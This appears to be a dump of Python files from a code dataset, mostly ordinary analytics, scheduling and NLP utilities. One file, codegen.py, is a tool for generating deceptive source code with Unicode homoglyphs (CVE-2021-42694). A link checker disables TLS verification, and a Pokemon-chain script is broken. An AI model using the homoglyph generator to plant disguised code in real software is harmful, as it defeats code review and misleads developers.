[\"M\", \"Y\"]) and (expiry_date > emo) else add\r\n\r\n                while self.is_holiday(expiry_date):\r\n                    expiry_date = op(expiry_date, Days(1))\r\n\r\n        return expiry_date\r\n\r\n    def is_businessday(self, date):\r\n        return not self.__calendar.is_holiday(date)\r\n\r\n    def is_holiday(self, date):\r\n        return self.__calendar.is_holiday(date)\r\n\r\n    def date_sequence(self, end, by, begin = None):\r\n        if begin is None:\r\n            begin = self.__value_date\r\n        next_date = begin\r\n        seq = []\r\n        num = int(by[:-1])\r\n        add_num = num\r\n        base = by[-1]\r\n\r\n        while (next_date <= end):\r\n            seq.append(next_date)\r\n            next_date = self.convert_tenor_to_date(str(num) + base, begin)\r\n            num += add_num\r\n\r\n        return 
seq\r\n","sub_path":"schedule/dayconvention.py","file_name":"dayconvention.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"179320512","text":"\"\"\"\nReleaseAllResources command class for SdpSubarrayLeafNode.\n\"\"\"\nimport threading\nimport time\nfrom logging import Logger\nfrom typing import Callable, Optional, Tuple\n\nfrom ska_control_model.task_status import TaskStatus\nfrom ska_tango_base.commands import ResultCode\nfrom ska_tango_base.control_model import ObsState\nfrom ska_tmc_common.timeout_callback import TimeoutCallback\nfrom tango import DevFailed\n\nfrom ska_tmc_sdpsubarrayleafnode.commands.abstract_command import SdpSLNCommand\n\n\nclass ReleaseAllResources(SdpSLNCommand):\n \"\"\"\n A class for SdpSubarayLeafNode's ReleaseAllResources() command.\n\n Releases all the resources of given SDP Subarray Leaf Node.\n It accepts the subarray id, releaseALL flag and receptorIDList in\n JSON string format.\n \"\"\"\n\n def __init__(self, component_manager, logger=None) -> None:\n super().__init__(component_manager, logger)\n self.timeout_id = f\"{time.time()}_{__class__.__name__}\"\n self.timeout_callback = TimeoutCallback(self.timeout_id, self.logger)\n self.task_callback: Callable\n\n def release_resources(\n self,\n logger: Logger,\n task_callback: Callable = None,\n # pylint: disable=unused-argument\n task_abort_event: Optional[threading.Event] = None,\n ) -> None:\n \"\"\"This is a long running method for ReleaseAllResources command, it\n executes do hook, invokes ReleaseAllResources command on SdpSubarray.\n\n :param logger: logger\n :type logger: logging.Logger\n :param task_callback: Update task state, defaults to None\n :type task_callback: Callable, optional\n :param task_abort_event: Check for abort, defaults to None\n :type task_abort_event: Event, optional\n \"\"\"\n self.component_manager.command_in_progress = \"ReleaseAllResources\"\n self.task_callback = task_callback\n task_callback(status=TaskStatus.IN_PROGRESS)\n self.component_manager.start_timer(\n self.timeout_id,\n self.component_manager.command_timeout,\n self.timeout_callback,\n )\n result_code, message = self.do()\n if result_code == ResultCode.FAILED:\n self.update_task_status(result_code, message)\n self.component_manager.stop_timer()\n else:\n lrcr_callback = self.component_manager.long_running_result_callback\n self.start_tracker_thread(\n self.component_manager.get_obs_state,\n ObsState.EMPTY,\n self.timeout_id,\n self.timeout_callback,\n command_id=self.component_manager.release_id,\n lrcr_callback=lrcr_callback,\n )\n\n def update_task_status(self, result: ResultCode, message: str = \"\"):\n if result == ResultCode.FAILED:\n self.task_callback(\n status=TaskStatus.COMPLETED,\n result=result,\n exception=message,\n )\n else:\n self.task_callback(status=TaskStatus.COMPLETED, result=result)\n self.component_manager.command_in_progress = \"\"\n\n # pylint: disable=arguments-differ\n def do(self) -> Tuple[ResultCode, str]:\n \"\"\"\n Method to invoke ReleaseAllResources command on SDP Subarray.\n\n :param argin: None.\n\n return:\n None\n \"\"\"\n result_code, message = self.init_adapter()\n if result_code == ResultCode.FAILED:\n return result_code, message\n try:\n log_msg = (\n \"Invoking ReleaseAllResources command on \"\n + \"{}\".format(self.sdp_subarray_adapter.dev_name),\n )\n self.logger.debug(log_msg)\n self.sdp_subarray_adapter.ReleaseAllResources(\n self.component_manager.cmd_ended_cb\n )\n 
except (AttributeError, ValueError, TypeError, DevFailed) as e:\n            self.logger.exception(\n                \"Command invocation failed on ReleaseAllResources: %s\", e\n            )\n            return self.component_manager.generate_command_result(\n                ResultCode.FAILED,\n                \"The invocation of the ReleaseAllResources command failed\"\n                + \" on {}. \".format(self.sdp_subarray_adapter.dev_name)\n                + \"Reason: Error in invoking the ReleaseAllResources command\"\n                + \" on Sdp Subarray. The command has NOT been executed. \"\n                + \"This device will continue with normal operation.\",\n            )\n        log_msg = (\n            \"ReleaseAllResources command successfully invoked on: \"\n            + \"{}\".format(self.sdp_subarray_adapter.dev_name)\n        )\n        self.logger.info(log_msg)\n        return (ResultCode.OK, \"\")\n","sub_path":"src/ska_tmc_sdpsubarrayleafnode/commands/release_resources_command.py","file_name":"release_resources_command.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"527395270","text":"Input= [0,1,-2,3,4,0,5,-27,9,0]\nOutput = [1,-2,3,4,5,-27,9,0,0,0]\n\nsample_array = [0,0,-3,4,0,0,9]\nzero_count=0\nresult=[]\n\nfor item in sample_array:\n\tif item==0:\n\t\tzero_count+=1\n\telse:\n\t\tresult.append(item)\n\nfor i in range(zero_count):\n\tresult.append(0)\t\n\nprint(result)\n","sub_path":"Problem5/problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"401972877","text":"class Edge:\n    \"\"\"\n    This class represents the undirected edges which connect the different nodes.\n    \"\"\"\n\n    def __init__(self, start_node, end_node, is_taxi_line=False, is_bus_line=False, is_metro_line=False, is_ferry_line=False):\n        \"\"\"\n        Init-function of the Edge-class.\n        :param start_node: First node which is connected to the edge\n        :param end_node: Second node which is connected to the edge\n        :param is_taxi_line: Boolean flag which shows if the current edge is a line of the taxi network\n        :param is_bus_line: Boolean flag which shows if the current edge is a line of the bus network\n        :param is_metro_line: Boolean flag which shows if the current edge is a line of the metro network\n        :param is_ferry_line: Boolean flag which shows if the current edge is a line of the ferry network\n        \"\"\"\n\n        self.start_node = start_node\n        self.end_node = end_node\n        self.is_taxi_line = is_taxi_line\n        self.is_bus_line = is_bus_line\n        self.is_metro_line = is_metro_line\n        self.is_ferry_line = is_ferry_line\n","sub_path":"edge.py","file_name":"edge.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"512054142","text":"
dictionaru\r\npokemon_dict = {}\r\nfor names in list_pokemons:\r\n if names[0] not in pokemon_dict:\r\n pokemon_dict[names[0]] = [names]\r\n else:\r\n pokemon_dict[names[0]].append(names)\r\n\r\n\r\ndef list_creation(order):\r\n global longest_order\r\n \r\n\r\n # Check the longest \r\n if len(order) > longest_count:\r\n longest_count = len(order)\r\n longest_order = order\r\n\r\n # This is use to find the next value / Recursion\r\n if chain[-1][-1] in pokemon_dict:\r\n for name in pokemon_dict[order[-1][-1]]:\r\n if name not in order:\r\n oder.append(name)\r\n list_creation(order)\r\n\r\n\r\n# Iterate all the names of the pokemons\r\nfor order in list_pokemons:\r\n list_creation([order])\r\n\r\nprint(longest_order)\r\n","sub_path":"q8 assignment/mainfile.py","file_name":"mainfile.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"319788832","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Author: Jakob Schaffarczyk \n# PGP: https://keyserver.ubuntu.com/pks/lookup?op=get&search=0x00bebdd0437ad513a4a0e13d93435cab4ca92fb9\n# Date: 02.11.2021\n\nfrom random import choice, random\nimport argparse\nimport re\nimport os\n\ndef about():\n print(\"Author: Jakob Schaffarczyk\")\n print(\"Date: 02.11.2021\")\n print(\"Name: codegen.py\")\n print(\"Version: v0.0.1\")\n print(\"\\nDescription\")\n print(\"Generate malicious code using homoglyphs (CVE-2021-42694)\")\n\ndef read_homoglyphs() -> dict:\n data = open(\"homoglyphs.txt\", \"r\").readlines()\n homoglyphs = {}\n for line in data:\n key = line[0]\n values = line[1:].strip()\n homoglyphs[key] = values\n return homoglyphs\n\ndef create_payload(template: bytes, random_char: bool = False) -> bytes:\n payload = template\n homoglyphs = read_homoglyphs()\n replacements = list(set(re.findall(rb'\\$.\\$', template)))\n for repl in replacements:\n char = chr(repl[1])\n if random_char:\n char = choice(homoglyphs[char]).encode()\n else:\n char = homoglyphs[char][0].encode()\n payload = payload.replace(repl, char)\n return payload\n\ndef main():\n # Parse command line arguments to object `args`\n parser = argparse.ArgumentParser(description=\"Generate malicious code using homoglyphs (CVE-2021-42694)\")\n parser.add_argument(\"-i\", \"--infile\", help=\"Input file containing homoglyph placeholders\")\n parser.add_argument(\"-o\", \"--outfile\", help=\"Output file to store the final code\")\n parser.add_argument(\"-r\", \"--random\", action=\"store_true\", help=\"Set flag to choose random homoglyph; take first one if not set\")\n parser.add_argument(\"-a\", \"--about\", action=\"store_true\", help=\"Print about text\")\n args = vars(parser.parse_args())\n\n # Print about information\n if args[\"about\"]:\n about()\n exit(0)\n \n # Check if required parameters exist\n if not args[\"infile\"] and not args[\"outfile\"]:\n parser.print_usage()\n exit(0)\n if args[\"infile\"]:\n infile = args[\"infile\"]\n else:\n print(\"[!] Input file is missing\")\n exit(0)\n if args[\"outfile\"]:\n outfile = args[\"outfile\"]\n else:\n print(\"[!] Output file is missing\")\n exit(0)\n \n # Check if template exist\n if not os.path.exists(infile):\n print(\"[!] 
Input file does not exist\")\n        exit(0)\n    \n    # Read input file\n    template = open(infile, 'rb').read()\n\n    # Create payload by replacing homoglyph placeholders\n    if args[\"random\"]:\n        payload = create_payload(template, random_char=True)\n    else:\n        payload = create_payload(template)\n    \n    # Store payload to output file\n    with open(outfile, 'wb') as f:\n        f.write(payload)\n    \n\nif __name__ == \"__main__\":\n    main()","sub_path":"codegen.py","file_name":"codegen.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"427893166","text":"# coding: utf-8\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('utf8') # Python 2's str defaults to ASCII and clashes with unicode, so these lines are needed\r\n\r\nfrom matplotlib.font_manager import FontProperties\r\nfont = FontProperties(fname=r\"c:\\windows\\fonts\\simsun.ttc\", size=14) # set the font used to display Chinese characters in plots\r\n\r\n\"\"\"\r\nhttps://tianchi.aliyun.com/notebook/detail.html?spm=5176.11409386.4851167.7.65c91d07FiVHVN&id=4796\r\n\r\n\"\"\"\r\n# import libraries necessary for this project\r\nimport os, sys, pickle\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.dates as mdates\r\n\r\nimport seaborn as sns\r\n\r\nfrom datetime import date\r\n\r\nfrom sklearn.model_selection import KFold, train_test_split, StratifiedKFold, cross_val_score, GridSearchCV\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.linear_model import SGDClassifier, LogisticRegression\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.metrics import log_loss, roc_auc_score, auc, roc_curve\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nimport xgboost as xgb\r\nimport lightgbm as lgb\r\n\r\n\r\n# Data analysis\r\n\r\n\r\n# Load the data and do some simple analysis\r\n\r\ndfoff = pd.read_csv('F:/competition/O2O Coupon Usage Forecast/ccf_offline_stage1_train.csv')\r\ndftest = pd.read_csv('F:/competition/O2O Coupon Usage Forecast/ccf_offline_stage1_test_revised.csv')\r\n\r\ndfon = pd.read_csv('F:/competition/O2O Coupon Usage Forecast/ccf_online_stage1_train.csv')\r\n\r\ndfoff.info()\r\n\r\nprint('With coupon, purchase made:', dfoff[(dfoff['Date_received'] != 'null') & (dfoff['Date'] != 'null')].shape[0])\r\nprint('No coupon, purchase made:', dfoff[(dfoff['Date_received'] == 'null') & (dfoff['Date'] != 'null')].shape[0])\r\nprint('With coupon, no purchase:', dfoff[(dfoff['Date_received'] != 'null') & (dfoff['Date'] == 'null')].shape[0])\r\nprint('No coupon, no purchase:', dfoff[(dfoff['Date_received'] == 'null') & (dfoff['Date'] == 'null')].shape[0])\r\n\r\n# users that appear in the test set but not in the training set\r\nprint('1. User_id in test set but not in training set', set(dftest['User_id']) - set(dfoff['User_id']))\r\n# merchants that appear in the test set but not in the training set\r\nprint('2. Merchant_id in test set but not in training set', set(dftest['Merchant_id']) - set(dfoff['Merchant_id']))\r\n\r\n\r\n# Coupons and distance\r\n\r\nprint('Discount_rate types:',dfoff['Discount_rate'].unique())\r\nprint('Distance types:', dfoff['Distance'].unique())\r\n# unique() returns all distinct values\r\n\r\n# convert Discount_rate and Distance\r\n\r\ndef getDiscountType(row):\r\n    if row == 'null':\r\n        return 'null'\r\n    elif ':' in row: # full-reduction offer (\"spend X, save Y\"), type=1; the two offer types may differ in how strongly they attract coupon use\r\n        return 1\r\n    else: # percentage discount, type=0\r\n        return 0\r\n\r\n\r\ndef convertRate(row):\r\n    \"\"\"Convert discount to rate: turn a full-reduction offer or null into a discount rate\"\"\"\r\n    if row == 'null':\r\n        return 1.0 # rate 1.0 means no discount\r\n    elif ':' in row:\r\n        rows = row.split(':')\r\n        return 1.0 - float(rows[1]) / float(rows[0]) # this conversion is not exact, but it is a useful reference value\r\n    else:\r\n        return float(row)\r\n\r\n\r\ndef getDiscountMan(row): # extract the spend threshold of a full-reduction offer as a feature; 0 for other types\r\n    if ':' in row:\r\n        rows = row.split(':')\r\n        return int(rows[0])\r\n    else:\r\n        return 0\r\n\r\n\r\ndef getDiscountJian(row): # extract the reduction amount of a full-reduction offer as a feature; 0 for other types\r\n    if ':' in row:\r\n        rows = row.split(':')\r\n        return int(rows[1])\r\n    else:\r\n        return 0\r\n\r\n\r\ndef processData(df):\r\n    # convert discount_rate\r\n    # use apply to run a function over every value of a column\r\n    df['discount_rate'] = df['Discount_rate'].apply(convertRate)\r\n    df['discount_man'] = df['Discount_rate'].apply(getDiscountMan)\r\n    df['discount_jian'] = df['Discount_rate'].apply(getDiscountJian)\r\n    df['discount_type'] = df['Discount_rate'].apply(getDiscountType)\r\n\r\n    print(df['discount_rate'].unique())\r\n\r\n    # convert distance\r\n    # the code below does two things: replace missing distances with -1, then convert all values from str to int\r\n    df['distance'] = df['Distance'].replace('null', -1).astype(int)\r\n    print(df['distance'].unique())\r\n    return df\r\n\r\ndfoff = processData(dfoff)\r\ndftest = processData(dftest)\r\n\r\n\r\n# Time\r\n\r\n# list all distinct coupon-received dates and sort the non-null values\r\ndate_received = dfoff['Date_received'].unique()\r\ndate_received = sorted(date_received[date_received != 'null'])\r\n\r\ndate_buy = dfoff['Date'].unique()\r\ndate_buy = sorted(date_buy[date_buy != 'null'])\r\n\r\nprint('Coupons received from',date_received[0],'to', date_received[-1])\r\nprint('Purchases from', date_buy[0], 'to', date_buy[-1])\r\n\r\n# look at how many coupons customers receive each day, and how many received coupons are then used\r\n\r\n# number of coupons received\r\ncouponbydate = dfoff[dfoff['Date_received'] != 'null'][['Date_received', 'Date']]\\\r\n    .groupby(['Date_received'], as_index=False).count()\r\n# groupby groups by Date_received and counts; the number of groups equals the number of distinct received dates\r\n# note: each group becomes one row, with just two columns: ['Date_received','count']\r\ncouponbydate.columns = ['Date_received','count']\r\n# number of coupons received and used\r\nbuybydate = dfoff[(dfoff['Date'] != 'null') & (dfoff['Date_received'] != 'null')][['Date_received', 'Date']]\\\r\n    .groupby(['Date_received'], as_index=False).count()\r\nbuybydate.columns = ['Date_received','count']\r\n\r\nsns.set_style('ticks')\r\nsns.set_context(\"notebook\", font_scale= 1.4)\r\nplt.figure(figsize = (12,8))\r\ndate_received_dt = pd.to_datetime(date_received, format='%Y%m%d')\r\n# convert dates to year-month-day format\r\n\r\n# bar charts\r\nplt.subplot(211)\r\nplt.bar(date_received_dt, couponbydate['count'], label = 'number of coupon received' )\r\nplt.bar(date_received_dt, buybydate['count'], label = 'number of coupon used')\r\nplt.yscale('log') # log scale on the y axis\r\nplt.ylabel('Count')\r\nplt.legend()\r\n\r\nplt.subplot(212)\r\nplt.bar(date_received_dt, buybydate['count']/couponbydate['count']) # ratio of coupons used\r\nplt.ylabel('Ratio(coupon used/coupon received)')\r\nplt.tight_layout() # plt.tight_layout() automatically adjusts the outer margins of the figure\r\n\r\n# New weekday features\r\n\r\ndef getWeekday(row):\r\n    if row == 'null':\r\n        return row\r\n    else:\r\n        return date(int(row[0:4]), int(row[4:6]), int(row[6:8])).weekday() + 1\r\n    # date(year, month, day); weekday() returns the day of week, 0-6 for Monday through Sunday\r\n\r\ndfoff['weekday'] = dfoff['Date_received'].astype(str).apply(getWeekday)\r\ndftest['weekday'] = dftest['Date_received'].astype(str).apply(getWeekday)\r\n\r\n# new feature weekday_type: 1 for Saturday and Sunday, 0 otherwise\r\ndfoff['weekday_type'] = dfoff['weekday'].apply(lambda x : 1 if x in [6,7] else 0 )\r\ndftest['weekday_type'] = dftest['weekday'].apply(lambda x : 1 if x in [6,7] else 0 )\r\n\r\n# change weekday to one-hot encoding\r\nweekdaycols = ['weekday_' + str(i) for i in range(1,8)]\r\nprint(weekdaycols)\r\n# output: ['weekday_1', 'weekday_2', 'weekday_3', 'weekday_4', 'weekday_5', 'weekday_6', 'weekday_7']\r\n\r\n# replace 'null' with numpy nan, then one-hot split on the weekday feature\r\ntmpdf = pd.get_dummies(dfoff['weekday'].replace('null', np.nan))\r\ntmpdf.columns = weekdaycols # the column names are weekdaycols\r\ndfoff[weekdaycols] = tmpdf # add the new columns to dfoff\r\n\r\ntmpdf = pd.get_dummies(dftest['weekday'].replace('null', np.nan))\r\ntmpdf.columns = weekdaycols\r\ndftest[weekdaycols] = tmpdf\r\n\r\n\r\n# Data labeling\r\n\r\n\"\"\"\r\nDate_received == 'null': y = -1\r\nDate != 'null' & Date-Date_received <= 15: y = 1\r\nOtherwise: y = 0\r\n\r\n\"\"\"\r\ndef label(row):\r\n    if row['Date_received'] == 'null':\r\n        return -1\r\n    if row['Date'] != 'null':\r\n        td = pd.to_datetime(row['Date'], format='%Y%m%d') - pd.to_datetime(row['Date_received'], format='%Y%m%d')\r\n        if td <= pd.Timedelta(15, 'D'): # 'D' means days; label 1 if the coupon was used within fifteen days\r\n            return 1\r\n    return 0\r\ndfoff['label'] = dfoff.apply(label, axis = 1) # apply label over the rows of dfoff to finish the labeling\r\nprint(dfoff['label'].value_counts())\r\n\r\n\"\"\"\r\n 0    988887\r\n\r\n-1    701602\r\n\r\n 1     64395\r\n\r\n\"\"\"\r\n\r\nprint('Existing columns:',dfoff.columns.tolist())\r\n\r\n\"\"\"\r\n['User_id', 'Merchant_id', 'Coupon_id', 'Discount_rate', 'Distance', 'Date_received', 'Date', 'discount_rate', \r\n'discount_man', 'discount_jian', 'discount_type', 'distance', 'weekday', 'weekday_type', 'weekday_1', 'weekday_2', \r\n'weekday_3', 'weekday_4','weekday_5', 'weekday_6', 'weekday_7', 'label']\r\n\r\n\"\"\"","sub_path":"CouponUsage_DA.py","file_name":"CouponUsage_DA.py","file_ext":"py","file_size_in_byte":8781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"575036602","text":"# 
check404.py\n#\n# A simple python script to check for broken links in HTML files. Largely based\n# on my check404.sh program I wrote a while back, just ported to Python for\n# maintainability and to use a higher level scripting language then bash.\n\n\nimport sys\nif sys.version_info[0] < 3:\n # Python 2 specific imports\n from HTMLParser import HTMLParser\n import urlparse\nelse:\n # Python 3 specific imports\n from html.parser import HTMLParser\n from urllib.parse import urlparse\n import urllib3\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\nimport argparse\nimport re\nimport requests\nimport glob\n\n\n# Terminal colors\n#\n# General use is like so:\n# print(tcolors.BLUE + \"This text is blue\" + tcolors.END)\nclass tcolors:\n END_COLOR = '\\033[0m' # Remove all formatting to console output\n UNDERLINE = '\\033[4m' # Add underline to console output\n RED = '\\033[91m' # Turn console output red\n GREEN = '\\033[92m' # Turn console output green\n YELLOW = '\\033[93m' # Turn console output yellow\n BLUE = '\\033[94m' # Turn console output blue\n PURPLE = '\\033[95m' # Turn console output purple\n CYAN = '\\033[96m' # Turn console output cyan\n\n\n# A simple HTML parser that prints color coded status codes to absolute URLs in\n# tags\nclass SimpleLinkParser(HTMLParser):\n def handle_starttag(self, tag, attrs):\n if (tag == 'a'):\n for key, value in attrs:\n if (key == 'href'):\n if (re.match(r'^https?:\\/\\/', value)):\n res = requests.get(value, verify=False)\n\n if (res.status_code >= 200 and res.status_code < 300):\n # Success\n print('{0}{1}{2} :: {3}'.format(tcolors.GREEN,\n res.status_code,\n tcolors.END_COLOR,\n value))\n elif (res.status_code >= 300 and\n res.status_code < 400):\n # Redirect\n print('{0}{1}{2} :: {3}'.format(tcolors.YELLOW,\n res.status_code,\n tcolors.END_COLOR,\n value))\n elif (res.status_code >= 400 and\n res.status_code < 500):\n # Client Error\n print('{0}{1}{2} :: {3}'.format(tcolors.RED,\n res.status_code,\n tcolors.END_COLOR,\n value))\n elif (res.status_code >= 500 and\n res.status_code < 600):\n # Server Error\n print('{0}{1}{2} :: {3}'.format(tcolors.RED,\n res.status_code,\n tcolors.END_COLOR,\n value))\n else:\n # Iunno man\n print('{0}{1}{2} :: {3}'.format(tcolors.CYAN,\n res.status_code,\n tcolors.END_COLOR,\n value))\n\n def handle_endtag(self, tag):\n pass\n\n def handle_data(self, data):\n pass\n\n\ndef main():\n app_description = ('A simple python script to test for broken links in '\n 'HTML files')\n # Get command-line Args\n parser = argparse.ArgumentParser(app_description)\n\n # Flags\n pass\n\n # Required Arguments\n parser.add_argument(\n 'html_files',\n type=str,\n nargs='+',\n help='Path(s) to HTML files')\n\n args = parser.parse_args()\n\n link_parser = SimpleLinkParser()\n\n htmlfiles = args.html_files\n if (len(htmlfiles) == 1):\n htmlfiles = glob.glob(htmlfiles[0])\n\n for html_file in htmlfiles:\n try:\n f = open(html_file)\n contents = f.read()\n f.close()\n\n link_parser.feed(contents)\n except Exception as e:\n print('--- An Exception occured ---')\n print('Exception instance: {0}'.format(type(e)))\n print('Exception args: {0}'.format(e.args))\n print(e)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/check404.py","file_name":"check404.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"129760722","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport spacy\nfrom spacy import displacy\nimport 
re\nimport nltk\n\n\n# In[2]:\n\nnlp = spacy.load('en_core_web_lg')\n#nlp = spacy.load('C:\\\\anaconda3\\\\lib\\\\site-packages\\\\en_core_web_sm\\\\en_core_web_sm-2.0.0')\n\n\n# In[7]:\n\n\n# doc=nlp(u'hello')\n# b=doc.to_bytes()\n\ndef get_pos_entities_parsed(sent):\n parsed_text_dict = {}\n doc = nlp(sent)\n posSent = \" \".join([token.text + '/' +token.pos_ for token in doc])\n entities = \"\\t\".join([token.text + '/' +token.label_+\"/\" + str(token.start_char) + \"/\" + str(token.end_char) for token in doc.ents])\n for token in doc:\n parsed_text_dict[token.i] = ([token.text, token.dep_, token.head.text, token.head.i, token.head.pos_, [(child.text, child.i) for child in token.children]])\n \n return (posSent, entities, parsed_text_dict)\n\n# #### This method will return POS tagged data\n# * Format will be word1/POS word2/POS word3/POS\n\n# In[3]:\n\ndef getPosTaggedData(sent):\n posSent = ''\n doc = nlp(sent)\n posSent = \" \".join([token.text + '/' +token.pos_ for token in doc])\n return posSent\n\n\n# In[38]:\n\n\n#text = 'Apple is looking at buying U.K. startup for $1 billion'\n#text = 'Wealth management is an investment-advisory discipline which incorporates financial planning, investment portfolio management and a number of aggregated financial services offered by a complex mix of asset managers, custodial banks, retail banks, financial planners and others'\n#getPosTaggedData(text)\n\n\n# In[5]:\n\n\ndef getEntitiesTagged(sent):\n posSent = ''\n doc = nlp(sent)\n posSent = \"\\t\".join([token.text + '/' +token.label_+\"/\" + str(token.start_char) + \"/\" + str(token.end_char) for token in doc.ents])\n return posSent\n\n\n# In[1]:\n\n\ndef getEntitiesTaggedAsList(sent):\n posSent = ''\n doc = nlp(sent)\n posSent = [(token.text, token.label_, str(token.start_char), str(token.end_char)) for token in doc.ents]\n return posSent\n\n\n# #### This method will return entities, word, start pos, end pos\n\n# In[6]:\n\n\n#getEntitiesTagged('Apple is looking at buying U.K. startup for $1 billion')\n\n\n# In[7]:\n\n\ndef getParseDataFromTextDict(sent):\n parsed_text_dict = {}\n doc = nlp(sent)\n #displacy.render(doc, style='dep', jupyter=True)\n for token in doc:\n parsed_text_dict[token.i] = ([token.text, token.dep_, token.head.text, token.head.i, token.head.pos_, [(child.text, child.i) for child in token.children]])\n #print(token)\n return parsed_text_dict\n\n\n# In[39]:\n\n\ndef getParseDataFromText(sent):\n parsed_text_list = []\n doc = nlp(sent)\n #displacy.render(doc, style='dep', jupyter=True)\n for token in doc:\n parsed_text_list.append([token.text, token.dep_, token.head.text, token.head.pos_, [(child.text, child.i) for child in token.children]])\n #print(token)\n return parsed_text_list\n\n#text = 'Wealth management is an investment-advisory discipline which incorporates financial planning, investment portfolio management and a number of aggregated financial services offered by a complex mix of asset managers, custodial banks, retail banks, financial planners and others'\n#for line in getParseDataFromText(text):\n# print(line)\n#visualizeParsedText(text)\n\n\n# In[9]:\n\n\n# sent = 'Apple is looking at buying U.K. 
startup for $1 billion'\n# doc = nlp(sent)\n# for token in doc:\n# parsed_text_list.append([token.text, token.dep_, token.head.text, token.head.i, token.head.pos_, [child.text for child in token.children]])\n# for child in token.children:\n# print(child, '\\t', child.i, '\\t')\n\n\n# In[4]:\n\n\ndef visualizeParsedText(sent):\n doc = nlp(sent)\n displacy.render(doc, style='dep', jupyter=True)\n\n\n# In[5]:\n\n\n## Create verb to subject and object mapping\n#visualizeParsedText('Apple is looking at buying U.K. startup for $1 billion')\n\n# sentence = 'A private equity fund is a collective investment scheme used for making investments in various equity ( and to a lesser extent debt ) securities according to one of the investment strategies associated with private equity.'\n# visualizeParsedText(sentence)\n\n# print(getAllSubjectObjectRelation(getParseDataFromText(sentence), getPosTaggedData(sentence)))\n\n\n# In[12]:\n\n\n#visualizeParsedText('Mouse has been killed by the cat')\n#visualizeParsedText('Cat killed the mouse')\n\n\n# In[13]:\n\n\ndef getIndexParsedText(parsedDataFromSpacy, tokenTempIndex):\n for index in range(len(parsedDataFromSpacy)):\n if parsedDataFromSpacy[index][0] == tokenTempIndex:\n return index\n \n return -1\n\n\n# In[32]:\n\n\ndef expandText(parsedDataFromSpacy, pos_data, token):\n #print(token)\n \n #print(pos_data)\n text = re.search('(([A-Za-z\\\\d\\\\.]+/(NOUN|PROPN) )+)?'+ token +'/[A-Za-z]+()?(([A-Za-z\\\\d\\\\.]+/(NOUN|PROPN) )+)?', pos_data).group()\n return \" \".join([textSplit.split('/')[0] for textSplit in text.split(' ')])\n\ndef expandTextNew(parsedDataFromSpacy, tokenTempIndex):\n consider =['compound', 'quantmod', 'amod', 'npadvmod', 'det', 'conj']\n returnText = ''\n for index in range(0, len(parsedDataFromSpacy)):\n token = parsedDataFromSpacy[index][0]\n rel = parsedDataFromSpacy[index][1]\n head = parsedDataFromSpacy[index][2]\n head_index = parsedDataFromSpacy[index][3]\n head_pos = parsedDataFromSpacy[index][4]\n childs = parsedDataFromSpacy[index][5]\n if index == tokenTempIndex:\n indexList = []\n for child in childs:\n if parsedDataFromSpacy[child[1]][1] in consider:\n indexList.append(child[1])\n indexList.append(tokenTempIndex)\n \n for index in range(min(indexList), max(indexList)+1):\n returnText += ' ' + parsedDataFromSpacy[index][0]\n return returnText.strip()\n #print(returnText.strip())\n\n#text = 'Apple is looking at buying U.K. 
startup for $1 billion'\n#text = 'This means that a legal mechanism is put into place which allows the lender to take possession and sell the secured property (\"foreclosure\" or \"repossession\") to pay off the loan in the event the borrower defaults on the loan or otherwise fails to abide by its terms.'\n#expandTextNew(getParseDataFromTextDict(text), 21)\n\n\n# ### Check for object presence on the basis of subject\n# * If subject is at left then object should be at right side of the verb\n# * Vice-versa\n\n# In[33]:\n\n\n# Find if currText is child of text\ndef isChildOf(parsedDataFromSpacy, currText, text, position):\n for parsedText in parsedDataFromSpacy:\n token = parsedText[0]\n dep = parsedText[1]\n head_text = parsedText[2]\n head_pos = parsedText[3]\n childs = parsedText[4]\n ## Immediate child\n if head_text == text:\n #print(currText, text)\n if currText in childs:\n return True\n \n return False \n\n\n# In[34]:\n\n\ndef getSubject(parsedDataFromSpacy, textIndex):\n for index in parsedDataFromSpacy.keys():\n parsedText = parsedDataFromSpacy[index]\n token = parsedText[0]\n dep = parsedText[1]\n head_text = parsedText[2]\n head_text_index = parsedText[3]\n head_pos = parsedText[4]\n childs = parsedText[5]\n \n if dep == 'nsubj' and head_text_index == textIndex:\n returnText = expandTextNew(parsedDataFromSpacy, index)\n return returnText\n return '' \n\n\n# In[35]:\n\n\ndef getObject(parsedDataFromSpacy, indexTemp):\n for index in range(0, len(parsedDataFromSpacy)):\n parsedText = parsedDataFromSpacy[index]\n token = parsedText[0]\n dep = parsedText[1]\n head_text = parsedText[2]\n head_text_index = parsedText[3]\n head_pos = parsedText[4]\n childs = parsedText[5]\n #print(indexTemp, parsedDataFromSpacy[index])\n if dep in ['dobj', 'pobj'] and head_text_index == indexTemp:\n #print(parsedDataFromSpacy[index])\n returnText = expandTextNew(parsedDataFromSpacy, index)\n return returnText\n \n return ''\n\n\n# In[36]:\n\n\ndef getAllSubjectObjectRelation(parsedDataFromSpacy):\n # list of tuple of type (subj, verb, obj)\n subj_obj_rel = []\n \n for index in range(0, 